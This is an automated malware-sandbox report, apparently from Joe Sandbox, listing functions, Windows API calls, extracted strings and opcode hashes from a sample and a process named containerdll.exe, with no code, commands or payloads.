Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: 61da225cf5bb8bfd2dcde69902100f5dcf7e664670b235292e9d116d25136469
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: 80C04C24004A74F41C213ABE31225BD2740FD62BC4B9225C3FD80D7143DE0E07EAA077

Function 00819F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00819DF1: GetDC.USER32(00000000), ref: 00819DF5
Part of subcall function 00819DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00819E00
Part of subcall function 00819DF1: ReleaseDC.USER32(00000000,00000000), ref: 00819E0B

GetObjectW.GDI32(?,00000018,?), ref: 00819F8D

Part of subcall function 0081A1E5: GetDC.USER32(00000000), ref: 0081A1EE
Part of subcall function 0081A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0081A21D
Part of subcall function 0081A1E5: ReleaseDC.USER32(00000000,?), ref: 0081A2B5

Strings

(, xrefs: 0081A0A3

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 8010e9330c12fa76e877a77efe50e22e486c8d6d2e82751989756ebb9849aaa4
Instruction ID: cff8d0eedbab37d23863a486f72801c4689ee05a2dc356ea7938d07f5869eb4f
Opcode Fuzzy Hash: 8010e9330c12fa76e877a77efe50e22e486c8d6d2e82751989756ebb9849aaa4
Instruction Fuzzy Hash: 50811171208614AFC714DF68C844A6BBBE9FFC8705F00491DF98AD7260DB79AE45CB62

Function 00810E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00810FF1

Strings

%ls, xrefs: 00810E76, 00810E8C
%s: %s, xrefs: 00811000

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: a3211f2289fb61eaad54986b8e68ef1312cab184ead46a6d7ff5962181fca811
Instruction ID: e20c41f28736d0900fb0604a4989d1e3344b76b0ec62271d19450133d62192c3
Opcode Fuzzy Hash: a3211f2289fb61eaad54986b8e68ef1312cab184ead46a6d7ff5962181fca811
Instruction Fuzzy Hash: 3551947158CB08FAEE211AD4DD46FA6765DFF08B04F204906B79AE44D1CAD255D06E13

Function 0082A918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0082AA84

Part of subcall function 00828849: IsProcessorFeaturePresent.KERNEL32(00000017,00828838,00000050,00833958,?,0080CFE0,00000004,00840EE8,?,?,00828845,00000000,00000000,00000000,00000000,00000000), ref: 0082884B
Part of subcall function 00828849: GetCurrentProcess.KERNEL32(C0000417,00833958,00000050,00840EE8), ref: 0082886D
Part of subcall function 00828849: TerminateProcess.KERNEL32(00000000), ref: 00828874

Strings

*?, xrefs: 0082A95B
., xrefs: 0082AC3B

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction ID: 0da6642250c35f03834b4fb2d9faefa6b87310850e0e8c1307fe3f8cefb5c720
Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction Fuzzy Hash: 8451C371D0012AAFDF18DFA9D881AADBBF5FF48310F258169E855E7301E6319E81CB51

Function 0080772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00807730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008078CC

Part of subcall function 0080A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0080A27A,?,?,?,0080A113,?,00000001,00000000,?,?), ref: 0080A458
Part of subcall function 0080A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0080A27A,?,?,?,0080A113,?,00000001,00000000,?,?), ref: 0080A489

Strings

:, xrefs: 008077A1

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: 1fba0294308c07c3f510b844d57122c505fcdb3d63a3e7009aa59c6e51a77529
Instruction ID: 62adc7e6c875dda0d00d5ce7b5ab3221914c6f356d907af29765c1b93d31f94c
Opcode Fuzzy Hash: 1fba0294308c07c3f510b844d57122c505fcdb3d63a3e7009aa59c6e51a77529
Instruction Fuzzy Hash: 78417371805258AADB64EB54DD55EEEB37CFF45300F0080AAB649E21D2DB746F84CF62

Function 0080B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

\\?\, xrefs: 0080B6BE, 0080B6FA, 0080B75B, 0080B7AE
UNC, xrefs: 0080B708

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: d750519255c38b78f7324394c5d7dd0f0e5c9fb7d33fda1312afb9cc2ae2fdba
Instruction ID: c8561833e3cecac3f96e5770e1aace934bf94d3ca74d9e4dc79c174c75217fa7
Opcode Fuzzy Hash: d750519255c38b78f7324394c5d7dd0f0e5c9fb7d33fda1312afb9cc2ae2fdba
Instruction Fuzzy Hash: 0E41AF3540021EABCBB0AF25DC41EAB77A9FF85790F108425F824E72D3E770DA40CAA1

Function 00818FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00818FC4

Strings

about:blank, xrefs: 00819082
Shell.Explorer, xrefs: 00818FEF

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: 107140fbd49926d129d4b0ae345847ce8de7e0798912c4216ee0e59b5a7a3a3f
Instruction ID: 740163aadd1d7b10fa28808696e984fd1825e1cd12416f4702ff11589cb3b012
Opcode Fuzzy Hash: 107140fbd49926d129d4b0ae345847ce8de7e0798912c4216ee0e59b5a7a3a3f
Instruction Fuzzy Hash: 0821A2712043049FCB089F68C8A5AAA77ACFF88711B14856DF849CB282DF74ED80CB61

Function 0080EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 0080EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0080EB92
Part of subcall function 0080EB73: GetProcAddress.KERNEL32(008481C0,CryptUnprotectMemory), ref: 0080EBA2

GetCurrentProcessId.KERNEL32(?,?,?,0080EBEC), ref: 0080EC84

Strings

CryptUnprotectMemory failed, xrefs: 0080EC7C
CryptProtectMemory failed, xrefs: 0080EC3B

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 94a9f79bbf6643f8c6d463143e0f444084400de14a6d313725a1d9dc7913e433
Instruction ID: 86829f9784bab28c369085d814c2e7ef89bd60a8648adf6ba7d86835cec7fd58
Opcode Fuzzy Hash: 94a9f79bbf6643f8c6d463143e0f444084400de14a6d313725a1d9dc7913e433
Instruction Fuzzy Hash: EA115932A11628AFFB155B34DD06A6F3714FF41724B04481AFC05EB2C1CB7A9E4187D5

Function 00810889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,008109D0,?,00000000,00000000), ref: 008108AD
SetThreadPriority.KERNEL32(?,00000000), ref: 008108F4

Part of subcall function 00806E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00806EAF

Strings

CreateThread failed, xrefs: 008108B9

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: b269605c8c83d1e9fa1b2957e71a9c5b9c9c3ef371b56bd921541a3ff9b221c3
Instruction ID: e1b11b18ca3352278b9de1a23f440de090c0c2011c117b3222ced8b08de42508
Opcode Fuzzy Hash: b269605c8c83d1e9fa1b2957e71a9c5b9c9c3ef371b56bd921541a3ff9b221c3
Instruction Fuzzy Hash: F201A2B524430A6FD6246F54EC81BA6B39CFF40711F200439FA86D61C1CEF1A8C59A64

Function 0080130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0080DA98: _swprintf.LIBCMT ref: 0080DABE
Part of subcall function 0080DA98: _strlen.LIBCMT ref: 0080DADF
Part of subcall function 0080DA98: SetDlgItemTextW.USER32(?,0083E154,?), ref: 0080DB3F
Part of subcall function 0080DA98: GetWindowRect.USER32(?,?), ref: 0080DB79
Part of subcall function 0080DA98: GetClientRect.USER32(?,?), ref: 0080DB85

GetDlgItem.USER32(00000000,00003021), ref: 0080134F
SetWindowTextW.USER32(00000000,008335B4), ref: 00801365

Strings

0, xrefs: 0080130E

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 7e170fe9bbf497eab56512c710291e33607a4b0b8dccb9d0a02de879d6885bb2
Instruction ID: ac4018cf7c05a4e51f564cf1750108ae257015b6ae97b886f383886585704886
Opcode Fuzzy Hash: 7e170fe9bbf497eab56512c710291e33607a4b0b8dccb9d0a02de879d6885bb2
Instruction Fuzzy Hash: 12F08C7020434CA6DFA60FA48C0DBAE3B98FB11359F0A8054FE49D6AE1C77CC995EA50

Function 0081084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00810A78,?), ref: 00810854
GetLastError.KERNEL32(?), ref: 00810860

Part of subcall function 00806E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00806EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00810869

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: f38792f8c6ea74f3935ff7addb6f6ce3b8e7651e9629a669e7f96506990acc82
Instruction ID: 78615802391d395ceeae473e19f9164e0816507917f283554e729a6b403d4b91
Opcode Fuzzy Hash: f38792f8c6ea74f3935ff7addb6f6ce3b8e7651e9629a669e7f96506990acc82
Instruction Fuzzy Hash: D1D05B3150852166C6142768DC09DAF7905FF91730F700725F639E51F5DE2509A145E6

Function 0080DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0080D32F,?), ref: 0080DA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0080D32F,?), ref: 0080DA61

Strings

RTL, xrefs: 0080DA5B

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 16365b311ac65f00f38f187b4c2ce244ec93acd497eea51b25c00c3f9be1916e
Instruction ID: ec88795fe6d07e4ff2abcb4def92736dfa51faaec9f3eee093bb8afaab66f8b0
Opcode Fuzzy Hash: 16365b311ac65f00f38f187b4c2ce244ec93acd497eea51b25c00c3f9be1916e
Instruction Fuzzy Hash: E9C01231385750B6DB341770BD1DB432E88BB51B12F05084CB541DE1D0D5E9C9408690

Analysis Process: containerdll.exePID: 748, Parent PID: 5908COMMON

Executed Functions

Function 00007FF848F33565 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec34dfc2e4385f9c2744d89f170ed19cc7ffaff23f30ad9fe425386711c53c7
Instruction ID: 5f3d0c987d4ab071f70dc98768de04100531021a2e603785c4e9e51ef889e6b7
Opcode Fuzzy Hash: dec34dfc2e4385f9c2744d89f170ed19cc7ffaff23f30ad9fe425386711c53c7
Instruction Fuzzy Hash: 7291AD71E1CA4E8FE784EB2CD8157ADBBE1FB99390F44017AC009D72C6DF6928058B55

Function 00007FF848F3D78A Relevance: 2.9, Strings: 2, Instructions: 387COMMON

Download Yara Rule

Strings

p\H, xrefs: 00007FF848F3D892
NH, xrefs: 00007FF848F3D824

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID: NH$p\H
API String ID: 0-1232786254
Opcode ID: 874f81cecef7c3dcdde953445461355901c76f97c284e5c243958f1badf2d684
Instruction ID: 54e4de906a619c1983df18a36e1cffcfc8de56a81ad04dc20646b4bfa8978ddc
Opcode Fuzzy Hash: 874f81cecef7c3dcdde953445461355901c76f97c284e5c243958f1badf2d684
Instruction Fuzzy Hash: F4E12671D1965ADFEB98EB68D4957B8B7B1FF58340F1400BAD00EE3296CB386880CB55

Function 00007FF848F45170 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

8mH, xrefs: 00007FF848F4526A

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID: 8mH
API String ID: 0-1362847371
Opcode ID: 0db21c9fcd0c2fb4039125d110850920a44ea4d3b599192350d9f1509d67502e
Instruction ID: 7c19d898d6964f6bdc811e72c8e860dea772ae7b0325a531ffbeea95e18cf8a6
Opcode Fuzzy Hash: 0db21c9fcd0c2fb4039125d110850920a44ea4d3b599192350d9f1509d67502e
Instruction Fuzzy Hash: 35511870D18A5D9FEB94EB68D859BADBBF1FF68740F50006AD00DE7296CF3468818B44

Function 00007FF848F3C72D Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F3C739

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 67eace6a5161d27252e1a5cab2c0337d44bc1e32e78753deb84175efd5db6bd8
Instruction ID: 408562b2ee630e9f6ca8e87e1c66020820ff65dffdb499d5731ac6205b246d69
Opcode Fuzzy Hash: 67eace6a5161d27252e1a5cab2c0337d44bc1e32e78753deb84175efd5db6bd8
Instruction Fuzzy Hash: 0631C43291E65A8FEB557BACA8150FD7B60FF413B5F040237D908CA0D3EF2C245186A9

Function 00007FF848F30A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

vH, xrefs: 00007FF848F30A70

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID: vH
API String ID: 0-2844672238
Opcode ID: 1df36f7965002b5c73eaea64fca7b2af07152d68e340ebe02490f7e01f1dbd37
Instruction ID: 1c8e80c6429b72d39148532bb493b3545c516f6d4952884ebb3dc2064e5ed252
Opcode Fuzzy Hash: 1df36f7965002b5c73eaea64fca7b2af07152d68e340ebe02490f7e01f1dbd37
Instruction Fuzzy Hash: 5E115831D0854E9FEB80FB68D8492B97BA0FF98381F4405B7D809C6192EF38A5448700

Function 00007FF848F311BD Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

XyH, xrefs: 00007FF848F3122D

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID: XyH
API String ID: 0-3434043539
Opcode ID: dc96c3a554331859027b3fff774ae50c8674008ff29f5a471bac1a3ee5d63a28
Instruction ID: 9d86d3d813759855050cb1b53734d10fff5f2b30a638e5731e3d8ee9a824e33a
Opcode Fuzzy Hash: dc96c3a554331859027b3fff774ae50c8674008ff29f5a471bac1a3ee5d63a28
Instruction Fuzzy Hash: 5E116D7090D68A8FEB99FB6488696B97BE0FF59341F0504BBE40AD60D2EF259484C714

Function 00007FF848F311D0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

XyH, xrefs: 00007FF848F3122D

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID: XyH
API String ID: 0-3434043539
Opcode ID: f1c709b1ac90926a7d9f8cd31b77166f3b0cef5d8973a02752a3758e3359a63f
Instruction ID: 8878bf856c6102ff35e46026a1b48b00ccf0ec8554f7cf5235ba2541dca8ba5c
Opcode Fuzzy Hash: f1c709b1ac90926a7d9f8cd31b77166f3b0cef5d8973a02752a3758e3359a63f
Instruction Fuzzy Hash: A0F0AF30C1D69E8EEF99BB6888192FA77E4FF59341F00047BE41DD20D1EF245594C614

Function 00007FF848F3A988 Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d57cf56cfb0c93d755e5c3ba1fb0b254526bd0aebcc92d8d23012ad5d3ffd22
Instruction ID: c00c2d9c5dc2d6ab52b3c307596f655d89f5ffb201582596f03645d3e33381d8
Opcode Fuzzy Hash: 5d57cf56cfb0c93d755e5c3ba1fb0b254526bd0aebcc92d8d23012ad5d3ffd22
Instruction Fuzzy Hash: 7BD13930D0D65ACFEB98EB68C4546BDB7B1FF69741F1400BAD40EA7292CB386881CB55

Function 00007FF848F316B8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93b8c5798e85589d21b7003699c6f34f7cefb0563bc0cf9357b0a360f6612c2
Instruction ID: 9170a1002fc1ea991dfd2fe8b8ce2e10ca161ad058fb62f6734ea041c9fbc7b5
Opcode Fuzzy Hash: d93b8c5798e85589d21b7003699c6f34f7cefb0563bc0cf9357b0a360f6612c2
Instruction Fuzzy Hash: 10819C31A0CA4A8FDB58EB2888555B977E2FF99740F14457AE44EC32C6CF34AC82C785

Function 00007FF848F3C5AD Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

